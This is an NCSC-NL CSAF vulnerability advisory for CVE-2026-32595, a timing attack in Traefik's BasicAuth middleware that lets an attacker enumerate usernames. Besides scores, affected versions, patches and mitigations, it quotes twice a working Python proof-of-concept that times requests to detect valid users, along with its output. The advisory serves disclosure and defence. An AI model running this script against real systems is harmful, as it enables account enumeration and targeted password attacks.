{
"document": {
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "National Cyber Security Centre",
"namespace": "https://www.ncsc.nl/"
},
"title": "CVE-2026-32595",
"tracking": {
"current_release_date": "2026-03-25T18:21:34.926242Z",
"generator": {
"date": "2026-02-17T15:00:00Z",
"engine": {
"name": "V.E.L.M.A",
"version": "1.7"
}
},
"id": "CVE-2026-32595",
"initial_release_date": "2026-03-20T18:29:15.684265Z",
"revision_history": [
{
"date": "2026-03-20T18:29:15.684265Z",
"number": "1",
"summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (3).| References created (4).| CWES updated (1)."
},
{
"date": "2026-03-20T18:29:18.812048Z",
"number": "2",
"summary": "NCSC Score created."
},
{
"date": "2026-03-20T18:29:37.073011Z",
"number": "3",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
},
{
"date": "2026-03-20T18:29:38.937052Z",
"number": "4",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T18:35:34.818458Z",
"number": "5",
"summary": "Unknown change."
},
{
"date": "2026-03-20T21:07:26.548817Z",
"number": "6",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T22:00:13.398896Z",
"number": "7",
"summary": "Source connected.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-21T01:08:12.858079Z",
"number": "8",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)."
},
{
"date": "2026-03-21T01:08:26.887343Z",
"number": "9",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-23T12:29:51.911909Z",
"number": "10",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| Product Identifiers created (1).| Product Remediations created (2).| References created (6).| CWES updated (1).| Vendor_assessment created."
},
{
"date": "2026-03-23T12:29:55.207255Z",
"number": "11",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-24T20:56:47.947018Z",
"number": "12",
"summary": "CVSS created.| Products connected (3).| Product Identifiers created (3)."
},
{
"date": "2026-03-24T20:57:12.992215Z",
"number": "13",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-25T18:13:13.028911Z",
"number": "14",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (4).| References created (5).| CWES updated (1)."
},
{
"date": "2026-03-25T18:13:14.719239Z",
"number": "15",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-25T18:13:38.273111Z",
"number": "16",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (5)."
}
],
"status": "interim",
"version": "16"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:rpm/3",
"product": {
"name": "vers:rpm/3",
"product_id": "CSAFPID-1441150",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_devspaces:3:"
}
}
}
],
"category": "product_name",
"name": "Red Hat OpenShift Dev Spaces"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:rpm/unknown",
"product": {
"name": "vers:rpm/unknown",
"product_id": "CSAFPID-2485335"
}
}
],
"category": "product_name",
"name": "traefik-rhel9"
}
],
"category": "product_family",
"name": "Red Hat OpenShift Dev Spaces"
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/3.7.0-ea1",
"product": {
"name": "vers:unknown/3.7.0-ea1",
"product_id": "CSAFPID-5902893",
"product_identification_helper": {
"cpe": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/<2.11.41",
"product": {
"name": "vers:unknown/<2.11.41",
"product_id": "CSAFPID-5874588",
"product_identification_helper": {
"cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=0|<2.11.41",
"product": {
"name": "vers:unknown/>=0|<2.11.41",
"product_id": "CSAFPID-5907231"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=0|<3.6.11",
"product": {
"name": "vers:unknown/>=0|<3.6.11",
"product_id": "CSAFPID-5907230"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=0|<=1.7.34",
"product": {
"name": "vers:unknown/>=0|<=1.7.34",
"product_id": "CSAFPID-5241306"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=3.0.0-beta1|<3.6.11",
"product": {
"name": "vers:unknown/>=3.0.0-beta1|<3.6.11",
"product_id": "CSAFPID-5874589"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=3.0.0|<=3.6.11",
"product": {
"name": "vers:unknown/>=3.0.0|<=3.6.11",
"product_id": "CSAFPID-5902892",
"product_identification_helper": {
"cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
}
}
},
{
"category": "product_version_range",
"name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2",
"product": {
"name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2",
"product_id": "CSAFPID-5874590"
}
}
],
"category": "product_name",
"name": "Traefik"
}
],
"category": "vendor",
"name": "Traefik"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-32595",
"cwe": {
"id": "CWE-208",
"name": "Observable Timing Discrepancy"
},
"notes": [
{
"category": "description",
"text": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.",
"title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32595.json"
},
{
"category": "description",
"text": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 comtain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.",
"title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32595"
},
{
"category": "description",
"text": "## Summary\n\nThere is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\nOriginal Description
\n\n### Summary\nA timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design\n- User doesn't exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n name: basicauth\n namespace: traefik-poc\nspec:\n basicAuth:\n secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: test-basicauth\n annotations:\n traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n ingressClassName: traefik\n rules:\n - http:\n paths:\n - path: /protected\n pathType: Prefix\n backend:\n service:\n name: whoami\n port:\n number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n times = []\n for _ in range(SAMPLES):\n start = time.perf_counter()\n requests.get(TARGET, auth=(username, password), timeout=5)\n elapsed = time.perf_counter() - start\n times.append(elapsed)\n return statistics.median(times)\nprint(f\"Target: {TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n median = measure_time(user)\n if median > 0.05: # bcrypt threshold\n status = \"[+] EXISTS (slow - bcrypt verification)\"\n else:\n status = \"[-] NOT FOUND (fast - immediate return)\"\n print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n - Attackers can enumerate valid usernames without authentication\n - Enables targeted password brute-force attacks against confirmed accounts\n - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires:\n - BasicAuth middleware enabled\n - Attacker able to make requests to protected endpoints\n - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n \n\n---",
"title": "github - https://api.github.com/advisories/GHSA-g3hg-j4jv-cwfr"
},
{
"category": "description",
"text": "A flaw was found in Traefik. An unauthenticated attacker can exploit a timing attack vulnerability in the BasicAuth middleware. By observing the time it takes for the middleware to respond, an attacker can determine if a submitted username is valid or not. This information disclosure allows for username enumeration.\nMODERATE. The vulnerability in Traefik's BasicAuth middleware allows an unauthenticated attacker to perform username enumeration through a timing attack. By observing response times, an attacker can distinguish valid usernames from invalid ones. This information disclosure could aid in further targeted attacks against Red Hat OpenShift Dev Spaces deployments utilizing Traefik with BasicAuth.",
"title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32595.json"
},
{
"category": "description",
"text": "## Summary\n\nThere is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\nOriginal Description
\n\n### Summary\nA timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design\n- User doesn't exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n name: basicauth\n namespace: traefik-poc\nspec:\n basicAuth:\n secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: test-basicauth\n annotations:\n traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n ingressClassName: traefik\n rules:\n - http:\n paths:\n - path: /protected\n pathType: Prefix\n backend:\n service:\n name: whoami\n port:\n number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n times = []\n for _ in range(SAMPLES):\n start = time.perf_counter()\n requests.get(TARGET, auth=(username, password), timeout=5)\n elapsed = time.perf_counter() - start\n times.append(elapsed)\n return statistics.median(times)\nprint(f\"Target: {TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n median = measure_time(user)\n if median > 0.05: # bcrypt threshold\n status = \"[+] EXISTS (slow - bcrypt verification)\"\n else:\n status = \"[-] NOT FOUND (fast - immediate return)\"\n print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n - Attackers can enumerate valid usernames without authentication\n - Enables targeted password brute-force attacks against confirmed accounts\n - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires:\n - BasicAuth middleware enabled\n - Attacker able to make requests to protected endpoints\n - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n \n\n---",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g3hg-j4jv-cwfr.json?alt=media"
},
{
"category": "description",
"text": "Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration in github.com/traefik/traefik",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4792.json?alt=media"
},
{
"category": "other",
"text": "0.00036",
"title": "EPSS"
},
{
"category": "other",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
"title": "CVSSV4"
},
{
"category": "other",
"text": "6.3",
"title": "CVSSV4 base score"
},
{
"category": "other",
"text": "4.5",
"title": "NCSC Score"
},
{
"category": "other",
"text": "Is related to CWE-208 (Observable Timing Discrepancy), The value of the most recent CVSS (V3) score",
"title": "NCSC Score top decreasing factors"
},
{
"category": "details",
"text": "Severity: 2\n",
"title": "Vendor assessment"
}
],
"product_status": {
"known_affected": [
"CSAFPID-5874588",
"CSAFPID-5874589",
"CSAFPID-5874590",
"CSAFPID-1441150",
"CSAFPID-2485335",
"CSAFPID-5902892",
"CSAFPID-5902893",
"CSAFPID-5241306",
"CSAFPID-5907230",
"CSAFPID-5907231"
]
},
"references": [
{
"category": "external",
"summary": "Source - cveprojectv5",
"url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32595.json"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32595"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Source - github",
"url": "https://api.github.com/advisories/GHSA-g3hg-j4jv-cwfr"
},
{
"category": "external",
"summary": "Source - redhat",
"url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32595.json"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g3hg-j4jv-cwfr.json?alt=media"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4792.json?alt=media"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
},
{
"category": "external",
"summary": "Reference - github; osv; redhat",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32595"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://github.com/advisories/GHSA-g3hg-j4jv-cwfr"
},
{
"category": "external",
"summary": "Reference - redhat",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32595"
}
],
"remediations": [
{
"category": "mitigation",
"details": "To mitigate the risk of username enumeration, restrict network access to the Traefik instance using firewall rules or network policies, allowing connections only from trusted sources. If BasicAuth is not strictly required, consider disabling or removing the BasicAuth middleware configuration.",
"product_ids": [
"CSAFPID-1441150",
"CSAFPID-2485335"
]
}
],
"scores": [
{
"cvss_v3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"products": [
"CSAFPID-1441150",
"CSAFPID-2485335",
"CSAFPID-5241306",
"CSAFPID-5874588",
"CSAFPID-5874589",
"CSAFPID-5874590",
"CSAFPID-5902892",
"CSAFPID-5902893",
"CSAFPID-5907230",
"CSAFPID-5907231"
]
}
],
"title": "CVE-2026-32595"
}
]
}